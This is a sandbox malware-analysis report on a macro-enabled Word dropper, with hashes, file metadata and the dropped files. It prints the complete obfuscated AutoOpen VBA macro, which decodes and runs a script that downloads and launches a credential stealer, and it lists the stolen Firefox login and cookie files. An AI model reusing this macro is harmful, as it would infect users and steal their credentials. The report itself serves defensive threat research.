0142be69...5b53 | Files
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Dropper
Downloader
Spyware
Threat Names:
Generic.DataStealer.1.10B5EEBC
Generic.DataStealer.1.53C171F3
Mal/HTMLGen-A
Filters:
Filename Category Type Severity Actions
C:\Users\FD1HVy\Desktop\CUsersUserDesktopfasfas.docm Sample File Word Document
Malicious
»
Mime Type application/vnd.ms-word.document.macroEnabled.12
File Size 40.67 KB
MD5 38ec908c3942da563a4bfce1cf0c5669 Copy to Clipboard
SHA1 f0b51127d5a203ed021347a2f164b7f384f3f9b6 Copy to Clipboard
SHA256 0142be69ae66b37ba2df304d74fd5dbd0aeb0a5d59b29d69b3512b6d603b5b53 Copy to Clipboard
SSDeep 768:0f0HrB/H7Obo20v0bgjwXQpNyS+pa0LRUxhy/bKldjT6FQfDjULWo311RLUXORO:W0LlNfPwXQnYfRkaOgQfDw6o3LRuOA Copy to Clipboard
ImpHash -
Office Information
»
Creator b.raduev
Last Modified By Windows User
Revision 3
Create Time 2020-10-04 17:38:00+00:00
Modify Time 2020-10-04 17:39:00+00:00
Last Printed 2015-10-05 11:11:00+00:00
Document Information
»
Application Microsoft Office Word
App Version 16.0000
Template Normal
Company Hewlett-Packard
Document Security NONE
Editing Time 1.0
Page Count 2
Line Count 46
Paragraph Count 13
Word Count 984
Character Count 5614
Chars With Spaces 6585
ScaleCrop False
SharedDoc False
VBA Macros (1)
»
Macro #1: AutoOpen
»
Attribute VB_Name = "AutoOpen"
Function OeBsBDJAFBVPwXvmpQPhk()
End Function
If 1 <> 1 Then
    Function cHxafyGOQsJLNKBzeyxdJ(1 as Integer)
    End Function
End If


Sub Document_Open()
cwqRTnIrAhnteXoHsTjMN
End Sub
Sub DocumentOpen()
cwqRTnIrAhnteXoHsTjMN
End Sub
Sub Auto_Open()
cwqRTnIrAhnteXoHsTjMN
End Sub
Sub AutoOpen()
cwqRTnIrAhnteXoHsTjMN
End Sub
Sub Auto_Exec()
cwqRTnIrAhnteXoHsTjMN
End Sub
Sub AutoExec()
cwqRTnIrAhnteXoHsTjMN
End Sub
Function DecodeBase64(b64$)
    Dim jhhhIlgoCDrrfybqCTUDm
    With CreateObject("Microsoft.XMLDOM").createElement("b64")
        .DataType = "bin.base64": .Text = b64
        jhhhIlgoCDrrfybqCTUDm = .nodeTypedValue
        With CreateObject("ADODB.Stream")
            .Open: .Type = 1: .Write jhhhIlgoCDrrfybqCTUDm: .Position = 0: .Type = 2: .Charset = "utf-8"
            DecodeBase64 = .ReadText
            .Close
        End With
    End With
End Function

Sub cwqRTnIrAhnteXoHsTjMN()

Dim MDwLLNcesSTnRppFbClaD As Integer, sLgRMkHOjsIzwgntiKXBM As Integer, lfPjwNpNWtogfuQqSXCuo As Boolean
MDwLLNcesSTnRppFbClaD = 861
sLgRMkHOjsIzwgntiKXBM = 3231
If MDwLLNcesSTnRppFbClaD >= sLgRMkHOjsIzwgntiKXBM Then
    lfPjwNpNWtogfuQqSXCuo = True
Else
    lfPjwNpNWtogfuQqSXCuo = True
End If


Dim rLvdoMvhxcEEvbEnBdCbG, onlYkHgcnVBPtdxFiEeQr, sebLmpQdyivtMdxkddfpe
rLvdoMvhxcEEvbEnBdCbG = 0
onlYkHgcnVBPtdxFiEeQr = 2595
While rLvdoMvhxcEEvbEnBdCbG < onlYkHgcnVBPtdxFiEeQr
    sebLmpQdyivtMdxkddfpe = sebLmpQdyivtMdxkddfpe + 1044
 rLvdoMvhxcEEvbEnBdCbG = rLvdoMvhxcEEvbEnBdCbG + 1
Wend


Dim GYYvfAYAnjXYVkrJwgIXi, wipbPgMbfusVsvXilnXyI, bKkkqLaDBHdhnjQJuptmz
GYYvfAYAnjXYVkrJwgIXi = 0
wipbPgMbfusVsvXilnXyI = 607
While GYYvfAYAnjXYVkrJwgIXi < wipbPgMbfusVsvXilnXyI
    bKkkqLaDBHdhnjQJuptmz = bKkkqLaDBHdhnjQJuptmz + 245
 GYYvfAYAnjXYVkrJwgIXi = GYYvfAYAnjXYVkrJwgIXi + 1
Wend

Dim FynRAKYqeNyVuYyBAMBfP As String
FynRAKYqeNyVuYyBAMBfP = "5AAED2DCC8DEEEA6E8F2D8CA4090D2C8C8CADC405A86DEDADAC2DCC840444448DACADA407A40B6A6F2E6E8CADA5CA4EADCE8"
Dim mffMbnvdMziOSxXNzPeHf As String
mffMbnvdMziOSxXNzPeHf = "D2DACA5C92DCE8CAE4DEE0A6CAE4ECD2C6CAE65C9AC2E4E6D0C2D8BA747482D8D8DEC6908ED8DEC4C2D85072606E6C5276B6"
Dim OiehcydhSwDIltshfyxCn As String
OiehcydhSwDIltshfyxCn = "A4CACCBA5C82E6E6CADAC4D8F25C8ECAE8A8F2E0CA504EA6F2E6E8CA4E564EDA5C9AC24E564EDCC2CE4E564ECADA4E564ECA"
Dim qoqgBAzNaWxxJwWbFYNrU As String
qoqgBAzNaWxxJwWbFYNrU = "DCE85C82EA4E564EE8DEDAC24E564EE8D2DEDC5C824E564EDAE64E564ED24E564EAA4E564EE8D24E564ED84E564EE64E525C"
Dim TcDfGeFFuqGeRySMazXDt As String
TcDfGeFFuqGeRySMazXDt = "8ECAE88CD2CAD8C8504EC24E564EDA4E564EE64E564ED2A64E564ECAE64E564EE6D24E564EDEDC4E584E9CDEDCA0EAC4D8D2"
Dim RzglAVvgzzIkrwlLbUwTh As String
RzglAVvgzzIkrwlLbUwTh = "C658A6E8C2E8D2C64E525CA6CAE8ACC2D8EACA5048DCEAD8D8584048DCEAD8D85276B6A4CACCBA5C82E6E6CADAC4D8F25C8E"
Dim FFPtQXdnEyPNBcCxTfhjz As String
FFPtQXdnEyPNBcCxTfhjz = "CAE8A8F2E0CA504EA6F24E564EE6E84E564ECADA5C4E564E9AC24E564EDCC2CECA4E564EDACADCE85C82EA4E564EE8DEDA4E"
Dim TQXSAcHbXEAIllSpQIWrR As String
TQXSAcHbXEAIllSpQIWrR = "564EC2E8D2DE4E564EDC5C82DA4E564EE6D24E564EAAE84E564ED24E564ED8E64E525C8ECAE88CD2CAD8C8504EC24E564EDA"
Dim TaRwOtIohOoJHKORzqVvm As String
TaRwOtIohOoJHKORzqVvm = "E64E564ED2864E564EDEDC4E564EE8CA4E564EF0E84E584E9CDEDCA0EAC4D8D2C658A6E8C2E8D2C64E525CA6CAE8ACC2D8EA"
Dim GTpeqQIhcwkQGaPfwKHXL As String
GTpeqQIhcwkQGaPfwKHXL = "CA5048DCEAD8D85840B692DCE8A0E8E4BA48DACADA5276509CCAEE5A9EC4D4CAC6E840A6F2E6E8CADA5C9CCAE85CAECAC486"
Dim QPlYCzexrsbVFngCryCYg As String
QPlYCzexrsbVFngCryCYg = "D8D2CADCE8525C88DEEEDCD8DEC2C88CD2D8CA504ED0E8E8E0E6745E5EE8D26ADC5CC2DCC8DCDED8D2D6CAC2DCC8E8DEDE5C"
Dim eseRaKYLcFowzOddfMqEI As String
eseRaKYLcFowzOddfMqEI = "E4EA5E686C64687062706E645CCAF0CA4E5848CADCEC7482A0A08882A882564EB8DCCAEEC4EAD2D8C85CCAF0CA4E527650CE"
Dim JeiUbMICflfYELxhgCNeL As String
JeiUbMICflfYELxhgCNeL = "CAE85AD2E8CADA4048CADCEC7482A0A08882A882B8DCCAEEC4EAD2D8C85CCAF0CA525C82E8E8E4D2C4EAE8CAE640567A404E"
Dim pLMzgxcylKltwunUWYXpi As String
pLMzgxcylKltwunUWYXpi = "90D2C8C8CADC4E76A6E8C2E4E85AA0E4DEC6CAE6E6405048CADCEC7482A0A08882A882564EB8DCCAEEC4EAD2D8C85CCAF0CA"
Dim VtixTcFVYkBAWurvvToFe As String
VtixTcFVYkBAWurvvToFe = "4E524444"


Dim fmgyQXEmiSVEhMWHbrOsI, MMuEDPYzdFdpnyCldtTgm, qBAyIKweulVVfryLSmhEL
qBAyIKweulVVfryLSmhEL = 3961
For fmgyQXEmiSVEhMWHbrOsI = 1 To qBAyIKweulVVfryLSmhEL
    MMuEDPYzdFdpnyCldtTgm = MMuEDPYzdFdpnyCldtTgm + 3001
Next fmgyQXEmiSVEhMWHbrOsI


Dim igeyjgMAzloGjOvcHwnbJ, IUmRMsbcqwSLVLhpWNPhK, VkVmVfIyMlgfHylQFwNKx
VkVmVfIyMlgfHylQFwNKx = 1304
For igeyjgMAzloGjOvcHwnbJ = 1 To VkVmVfIyMlgfHylQFwNKx
    IUmRMsbcqwSLVLhpWNPhK = IUmRMsbcqwSLVLhpWNPhK + 4338
Next igeyjgMAzloGjOvcHwnbJ


Dim omVyqqbwmMuAqJcuLcBHl, ILAAYFBsTFDInXProurvw, LXpOogkWQzIevEzuWqKze
omVyqqbwmMuAqJcuLcBHl = 0
ILAAYFBsTFDInXProurvw = 3964
While omVyqqbwmMuAqJcuLcBHl < ILAAYFBsTFDInXProurvw
    LXpOogkWQzIevEzuWqKze = LXpOogkWQzIevEzuWqKze + 2078
 omVyqqbwmMuAqJcuLcBHl = omVyqqbwmMuAqJcuLcBHl + 1
Wend

Dim SbeiQJMBoNsURFpGCmKjP As String
Dim QEYUHRYMDJtXeFMVEFRAa As String
Dim PHLLubaRtHRiAGYlKIqnL As String
Dim OdcpbevTcaxtTzKhQVXWT As String
Dim DqJQGifPYwpXsrfBMFBpz As String
Dim jRJfFtqFwIpjMoBRnMABd As String
jRJfFtqFwIpjMoBRnMABd = "86E4CAC2E8CA9EC4D4CAC6E85044AEE6C6E4D2E0E85CE6D0CAD8D844525CE4EADC5044"
DqJQGifPYwpXsrfBMFBpz = "4AA88A9AA04A"
OdcpbevTcaxtTzKhQVXWT = "B8A8F4A88AD2E4D4D8D486A09C86E6E488C4D8ECEE865CECC4E6"
PHLLubaRtHRiAGYlKIqnL = FynRAKYqeNyVuYyBAMBfP & mffMbnvdMziOSxXNzPeHf & OiehcydhSwDIltshfyxCn & qoqgBAzNaWxxJwWbFYNrU & TcDfGeFFuqGeRySMazXDt & RzglAVvgzzIkrwlLbUwTh & FFPtQXdnEyPNBcCxTfhjz & TQXSAcHbXEAIllSpQIWrR & TaRwOtIohOoJHKORzqVvm & GTpeqQIhcwkQGaPfwKHXL & QPlYCzexrsbVFngCryCYg & eseRaKYLcFowzOddfMqEI & JeiUbMICflfYELxhgCNeL & pLMzgxcylKltwunUWYXpi & VtixTcFVYkBAWurvvToFe
QEYUHRYMDJtXeFMVEFRAa = "E0DEEECAE4E6D0CAD8D85CCAF0CA"
SbeiQJMBoNsURFpGCmKjP = "AEA6C6E4D2E0E85CA6D0CAD8D8"
lPMUqMgmOHHVzVCDOQbDs = "%BAT%"
Dim TDHqCcbdnFtkDgeVmOUgg As String
For iMsnnNQUWxLeJonbOcqoB = 1 To Len(jRJfFtqFwIpjMoBRnMABd) Step 2
    jdUXjhwVaWEuWKPpcooji = Chr(Val("&H" & (Mid(jRJfFtqFwIpjMoBRnMABd, iMsnnNQUWxLeJonbOcqoB, 2))))
    TDHqCcbdnFtkDgeVmOUgg = TDHqCcbdnFtkDgeVmOUgg & Chr(Asc(jdUXjhwVaWEuWKPpcooji) / 2)
Next iMsnnNQUWxLeJonbOcqoB
Dim ajINImSfmhoHiGKFLPUeT As String
For lbymLHvaEodPNDgbcXUlJ = 1 To Len(DqJQGifPYwpXsrfBMFBpz) Step 2
    MobqkJuVaOFkFNikBWExf = Chr(Val("&H" & (Mid(DqJQGifPYwpXsrfBMFBpz, lbymLHvaEodPNDgbcXUlJ, 2))))
    ajINImSfmhoHiGKFLPUeT = ajINImSfmhoHiGKFLPUeT & Chr(Asc(MobqkJuVaOFkFNikBWExf) / 2)
Next lbymLHvaEodPNDgbcXUlJ
Dim CHtJXlGxPXiPvuzxFyjMO As String
For ChQqeFAjmHxYNmuHFcSOw = 1 To Len(OdcpbevTcaxtTzKhQVXWT) Step 2
    lbpDxekJlxOkeYABsTEgn = Chr(Val("&H" & (Mid(OdcpbevTcaxtTzKhQVXWT, ChQqeFAjmHxYNmuHFcSOw, 2))))
    CHtJXlGxPXiPvuzxFyjMO = CHtJXlGxPXiPvuzxFyjMO & Chr(Asc(lbpDxekJlxOkeYABsTEgn) / 2)
Next ChQqeFAjmHxYNmuHFcSOw
Dim hUyzFWUrhjvgxDesmVgPo As String
For NqSuaTLpqDwlPKfFHlLQj = 1 To Len(SbeiQJMBoNsURFpGCmKjP) Step 2
    hDVOtcloqqEtBtEFfEcjc = Chr(Val("&H" & (Mid(SbeiQJMBoNsURFpGCmKjP, NqSuaTLpqDwlPKfFHlLQj, 2))))
    hUyzFWUrhjvgxDesmVgPo = hUyzFWUrhjvgxDesmVgPo & Chr(Asc(hDVOtcloqqEtBtEFfEcjc) / 2)
Next NqSuaTLpqDwlPKfFHlLQj
Dim YnQRnrzYCGIHhqXWTLjlB As String
For LFkuwMQIzXkHbQrhctzyM = 1 To Len(QEYUHRYMDJtXeFMVEFRAa) Step 2
    adKpWpNYKTHpynHGwQDIp = Chr(Val("&H" & (Mid(QEYUHRYMDJtXeFMVEFRAa, LFkuwMQIzXkHbQrhctzyM, 2))))
    YnQRnrzYCGIHhqXWTLjlB = YnQRnrzYCGIHhqXWTLjlB & Chr(Asc(adKpWpNYKTHpynHGwQDIp) / 2)
Next LFkuwMQIzXkHbQrhctzyM
Dim njPlQJRqHnTjVGKkGtOXT As String
For CJwIgrYsRLTsUWGWJzcnV = 1 To Len(lPMUqMgmOHHVzVCDOQbDs) Step 2
    guNLDoRshxmFyJysBJsSX = Chr(Val("&H" & (Mid(lPMUqMgmOHHVzVCDOQbDs, CJwIgrYsRLTsUWGWJzcnV, 2))))
    njPlQJRqHnTjVGKkGtOXT = njPlQJRqHnTjVGKkGtOXT & Chr(Asc(guNLDoRshxmFyJysBJsSX) / 2)
Next CJwIgrYsRLTsUWGWJzcnV

Dim DybQRIhndbPXphKQpOWwV As String
For cveWbAMHkaKPxxXoabDAe = 1 To Len(PHLLubaRtHRiAGYlKIqnL) Step 2
    wfwuNPCQcelqRAcVSQhuF = Chr(Val("&H" & (Mid(PHLLubaRtHRiAGYlKIqnL, cveWbAMHkaKPxxXoabDAe, 2))))
    DybQRIhndbPXphKQpOWwV = DybQRIhndbPXphKQpOWwV & Chr(Asc(wfwuNPCQcelqRAcVSQhuF) / 2)
Next cveWbAMHkaKPxxXoabDAe

Dim kDzUzojJEhpKXflqeDwWI As String
Set PAYQaJenWSLJXvpIWCchY = CreateObject(hUyzFWUrhjvgxDesmVgPo)
kDzUzojJEhpKXflqeDwWI = PAYQaJenWSLJXvpIWCchY.ExpandEnvironmentStrings(ajINImSfmhoHiGKFLPUeT)
Set PAYQaJenWSLJXvpIWCchY = Nothing

Dim GSkQtdDEJRaSjyLwVAWae As String
GSkQtdDEJRaSjyLwVAWae = kDzUzojJEhpKXflqeDwWI & "\JoHMwmhDhPJuWqSOTCEMf.txt"

Dim EyxFiOXQzapNDfvQyQGQr As Integer
EyxFiOXQzapNDfvQyQGQr = FreeFile

Open GSkQtdDEJRaSjyLwVAWae For Output As EyxFiOXQzapNDfvQyQGQr

Print #EyxFiOXQzapNDfvQyQGQr, TDHqCcbdnFtkDgeVmOUgg & YnQRnrzYCGIHhqXWTLjlB & " " & DybQRIhndbPXphKQpOWwV & """), 0"

Close EyxFiOXQzapNDfvQyQGQr

Name kDzUzojJEhpKXflqeDwWI & "\JoHMwmhDhPJuWqSOTCEMf.txt" As kDzUzojJEhpKXflqeDwWI & CHtJXlGxPXiPvuzxFyjMO

CreateObject(hUyzFWUrhjvgxDesmVgPo).Exec ("cscript " & kDzUzojJEhpKXflqeDwWI & CHtJXlGxPXiPvuzxFyjMO)

Dim qVqdFUsuQxWltXUtRxRGI, LjmFkiJobVnktUfgDDqvA, UMNyfsyInwLkIDMexuMIf
qVqdFUsuQxWltXUtRxRGI = 0
LjmFkiJobVnktUfgDDqvA = 691
While qVqdFUsuQxWltXUtRxRGI < LjmFkiJobVnktUfgDDqvA
    Dim PAIaadOnnSAlhPvyhfPkE As Integer, MzBYJqscgiDLvflexfpJv As Integer, YCkYAMrEppVyzcbhapLwl As Boolean
    PAIaadOnnSAlhPvyhfPkE = 4177
    MzBYJqscgiDLvflexfpJv = 4258
    If MzBYJqscgiDLvflexfpJv >= PAIaadOnnSAlhPvyhfPkE Then
       YCkYAMrEppVyzcbhapLwl = False
    Else
       YCkYAMrEppVyzcbhapLwl = False
    End If
    UMNyfsyInwLkIDMexuMIf = UMNyfsyInwLkIDMexuMIf + 325
    qVqdFUsuQxWltXUtRxRGI = qVqdFUsuQxWltXUtRxRGI + 1
Wend


Dim UckWwODnjSSnANchlFqwX, qofPaghuNpQqkQIYwmjVm, YUddyuBSlkCkpDMfgwIvR
YUddyuBSlkCkpDMfgwIvR = 3492
For UckWwODnjSSnANchlFqwX = 1 To YUddyuBSlkCkpDMfgwIvR
    qofPaghuNpQqkQIYwmjVm = qofPaghuNpQqkQIYwmjVm + 4774
Next UckWwODnjSSnANchlFqwX

End Sub
YARA Matches (1)
»
Rule Name Rule Description Classification Score Actions
VBA_Obfuscation_ObjectName VBA initializes COM object from long variable name; possible obfuscation -
2/5
C:\Users\FD1HVy\AppData\Roaming\newbuild.exe Dropped File Binary
Malicious
»
Mime Type application/vnd.microsoft.portable-executable
File Size 128.00 KB
MD5 a9045a197fe0d39fe9d96f3937788f91 Copy to Clipboard
SHA1 6a50a765f5614c010d4e216277c4ede8468b2ed0 Copy to Clipboard
SHA256 c6cb722930bea7d2ea599fde36d8ab5c6f1ed25fc00ee9fa33c15404d962b89e Copy to Clipboard
SSDeep 3072:rFypwZ2XJNCycTqO6qdSbXZXI8Svyg1LryGSHypbX57x5YACKTaF/oDhqc:rzZqJNI1rrSypbNzYCaFADhq Copy to Clipboard
ImpHash f34d5f2d4577ed6d9ceec516c1f5a744 Copy to Clipboard
PE Information
»
Image Base 0x400000
Entry Point 0x41c63a
Size Of Code 0x1ca00
Size Of Initialized Data 0x800
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 2020-09-30 10:24:48+00:00
Version Information (7)
»
Assembly Version 0.0.0.0
FileDescription
FileVersion 0.0.0.0
InternalName Anubis.exe
LegalCopyright
OriginalFilename Anubis.exe
ProductVersion 0.0.0.0
Sections (3)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x402000 0x1c870 0x1ca00 0x200 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.17
.rsrc 0x420000 0x4d4 0x600 0x1cc00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 3.7
.reloc 0x422000 0xc 0x200 0x1d200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 0.1
Imports (1)
»
mscoree.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
_CorExeMain 0x0 0x402000 0x1c610 0x1a810 0x0
Memory Dumps (1)
»
Name Process ID Start VA End VA Dump Reason PE Rebuild Bitness Entry Point AV YARA Actions
newbuild.exe 10 0x00E70000 0x00E93FFF Relevant Image True 32-bit - True False
Local AV Matches (1)
»
Threat Name Severity
Generic.DataStealer.1.10B5EEBC
Malicious
C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_h5bhifgv.f40.ps1 Dropped File Text
Whitelisted
»
Also Known As C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_bp5c4duz.ro0.psm1 (Dropped File)
Mime Type text/x-powershell
File Size 1 Bytes
MD5 c4ca4238a0b923820dcc509a6f75849b Copy to Clipboard
SHA1 356a192b7913b04c54574d18c28d46e6395428ab Copy to Clipboard
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b Copy to Clipboard
SSDeep 3:U:U Copy to Clipboard
ImpHash -
File Reputation Information
»
Severity
Whitelisted
9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a Downloaded File Text
Whitelisted
»
Parent File analysis.pcap
Mime Type text/html
File Size 162 Bytes
MD5 4f8e702cc244ec5d4de32740c0ecbd97 Copy to Clipboard
SHA1 3adb1f02d5b6054de0046e367c1d687b6cdf7aff Copy to Clipboard
SHA256 9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a Copy to Clipboard
SSDeep 3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu Copy to Clipboard
ImpHash -
File Reputation Information
»
Severity
Whitelisted
C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Modified File Stream
Unknown
»
Mime Type application/octet-stream
File Size 47.45 KB
MD5 e6d8c97c2fbe39b4ee9f62f730dca229 Copy to Clipboard
SHA1 8fc1008dff4525300faf51b6544bc5687b44aa7d Copy to Clipboard
SHA256 7ebeb0e2c0f476c75b597d9edc396576e9d4587cc46821ab22203341444f0a04 Copy to Clipboard
SSDeep 768:jUpAa5BHMrxbfrRJPFh48Fq3ThRW/Y+e+jH0qlwKH/mYoyopbjoRjdvRIs454Z6D:jUpAa5RMrxbflJdh4thRW/3e+jH0qWKq Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Local\Temp\JoHMwmhDhPJuWqSOTCEMf.txt Dropped File Text
Unknown
»
Also Known As C:\Users\FD1HVy\AppData\Local\Temp\TzTEirjljCPNCsrDblvwC.vbs (Dropped File)
Mime Type text/x-vbscript
File Size 761 Bytes
MD5 9a702fc0fcf035d9b7ef5944a59e91ef Copy to Clipboard
SHA1 3c45dbe34be13587ca44cf7bbd75fc3dc996b2e6 Copy to Clipboard
SHA256 04578b648485d90b9acec641efc809501948ece8961059cfdd1288be0172314d Copy to Clipboard
SSDeep 12:+RtdUngkY4QnpwgeYkk/CutLbhHLHCPZA/p25mMGy:+RnKRYk2DLoA/UJGy Copy to Clipboard
ImpHash -
screen.jpeg Embedded File Image
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type image/jpeg
File Size 155.09 KB
MD5 8f8a59034f55fdf21b748a75d991eff4 Copy to Clipboard
SHA1 3d30365d43108b148474c811d1b97bea1555f427 Copy to Clipboard
SHA256 efa34919eefcce6c999f8eefd2d1595831262e25a879d8bee5d1cf9cd7febf73 Copy to Clipboard
SSDeep 3072:exoV+8gPp/GrHjUglKdHDFXXD4gGPxRRMtGDUoDaRc:whv8rDUgoDFXXDKHDPDP Copy to Clipboard
ImpHash -
Files\4uV4065ClZioLoOxUX7f.docx Embedded File ZIP
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type application/zip
File Size 85.61 KB
MD5 6505876785cc799d07fe987d7a9afffc Copy to Clipboard
SHA1 93548a519116eeea60842c526cd25740451abcca Copy to Clipboard
SHA256 4b36eaa234b8b375239bb36c56c06a5f4e21380e963790d58df5a94789751a5b Copy to Clipboard
SSDeep 1536:ukq6T/OWQgVrWIvEMMH0mQJxgBJRoGnlwAD4XFH4tn3iOPiCve:ukDT/OEoMC0JPYBKAD4WnRPise Copy to Clipboard
ImpHash -
Files\7d4Q8tI0a.docx Embedded File ZIP
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type application/zip
File Size 94.16 KB
MD5 89679a82189d658ccfcb4b5ec51b3572 Copy to Clipboard
SHA1 2b0590f76c64100b1d325aa0805aa9884651b0fa Copy to Clipboard
SHA256 334d7dd16a0e9286edaae8c84e72ab77f675e85dbb8e2fb6ff5f5e6404c02059 Copy to Clipboard
SSDeep 1536:RymoCsRIAssPCuLfE/T0NqKV3Q4Xb2TiRNHmxcz5Qrx6oAaYAjAlwukCdN2fI6sd:RxoHR/PCKs/TC37aiR56Fd4ltkAMgeIH Copy to Clipboard
ImpHash -
Files\CQmwTaiySiiMfKSxL.docx Embedded File ZIP
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type application/zip
File Size 61.57 KB
MD5 7c7fa8ae687ab47d93d29b6e1318ff57 Copy to Clipboard
SHA1 9d91ab134b8a572ceaa6fe2835fc454f7a57c450 Copy to Clipboard
SHA256 27e7778e6d0033efa33ac3128f2820ad467918d555aae57d2c48e6547ec41f55 Copy to Clipboard
SSDeep 1536:J5e2MCXKKyPhAiu/d5j5Wr7UlpnhiJSIw0:J5z6ZVG55n1Iw0 Copy to Clipboard
ImpHash -
Files\Gwq5EHvw1.docx Embedded File ZIP
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type application/zip
File Size 86.00 KB
MD5 6a84a38efcb8a207a610c41bbf4f9263 Copy to Clipboard
SHA1 ab67579c89c85e86dc4257f3ebca25af2b43fdd1 Copy to Clipboard
SHA256 08cff1409f5f0100667ab77d66c2f8e7e2c1bc5984b0292db35f5af50583f61d Copy to Clipboard
SSDeep 1536:mxkRonSXxaPSfdqcVfTOGDp3iIoTrBDz/9bNO96Pag0q9le+E6hU9wEUtiV5k9c:mxklhmSfdRRZFiduYPag0qreL7sEVWG Copy to Clipboard
ImpHash -
Files\YsuINtJM29u.docx Embedded File ZIP
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type application/zip
File Size 59.43 KB
MD5 5772a537df54a1b01c583d86e6fbcacc Copy to Clipboard
SHA1 d5e6f84fd6c04a2f79df1e9cc7dcea56111318b6 Copy to Clipboard
SHA256 1c275abca22c66623e18dc8289812debf07c15e3dfc22bf4e19d745f41b1e643 Copy to Clipboard
SSDeep 1536:WLzHrOhPvJVjvZMuNM7FPVxYi1l4nRaLLm43jKYvZY:WjORBVjv/M1VphjKT Copy to Clipboard
ImpHash -
UserAgents.txt Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type text/plain
File Size 196 Bytes
MD5 97f4b711f8cfe4bce1eb110f5d71ebcb Copy to Clipboard
SHA1 9fff560c3d44dca8a200279f67f0f5e6c1ce3edd Copy to Clipboard
SHA256 4fb558f430b801e7c16daecd0b6ba7224bac9cfdbc91d067a7b4b8e387a89b2c Copy to Clipboard
SSDeep 6:VLRB2DOexWb2RhQJFtXXUh3HjfE9LRB2DOexWakf1:VRB2DOexWb2RKJFtHUhzENRB2DOexWaq Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_55_52.2776960+02_0011 Dropped File Sqlite
Unknown
»
Also Known As C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_56_05.7300489+02_0011 (Dropped File)
C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite (Dropped File)
Mime Type application/x-sqlite3
File Size 512.00 KB
MD5 4ead359ccc72a245e9503f85f122fd2a Copy to Clipboard
SHA1 9d357ce39713f2f8245f6231eeabde876436e184 Copy to Clipboard
SHA256 8e7904fb32e5dbc24bbc7d973542eec9de99e9fee8caebf5c9d1a642edf28b0e Copy to Clipboard
SSDeep 192:Ix96zOAJweoQHswaprRET6u3tKC18HQSJdIdFN88Dcs98ZgNNQqfmwCUjnqwCm:IxYvoQsprREeYT8HQuqyqfmybx Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_55_55.0277372+02_0011 Dropped File Stream
Unknown
»
Also Known As C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_56_05.9332145+02_0011 (Dropped File)
C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db (Dropped File)
C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\logins.json (Dropped File)
C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key4.db (Dropped File)
Mime Type application/octet-stream
File Size 16.00 KB
MD5 a83139a45da20d73ad7042914723ebd9 Copy to Clipboard
SHA1 df5aae1505079877373f2c9270f26e307df47577 Copy to Clipboard
SHA256 09f3b9123334947128656097e64017e2fa3de9169c36295f0ea2f090ae17f182 Copy to Clipboard
SSDeep 3:Lt/hV/plfltt/lE9lllnldlHGltdl/l8/V0V6IynnbbgqgRzf0uvslcSubRMwy49:5X9cvVmXy/VnIBRpNSoy4GVMH0cLD Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_56_05.9332145+02_0011 Dropped File Sqlite
Unknown
»
Also Known As C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_55_59.0912452+02_0011 (Dropped File)
C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\logins.json (Dropped File)
C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key4.db (Dropped File)
C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db (Dropped File)
Mime Type application/x-sqlite3
File Size 288.00 KB
MD5 2d4ff96d781542fdda5fe6a061538570 Copy to Clipboard
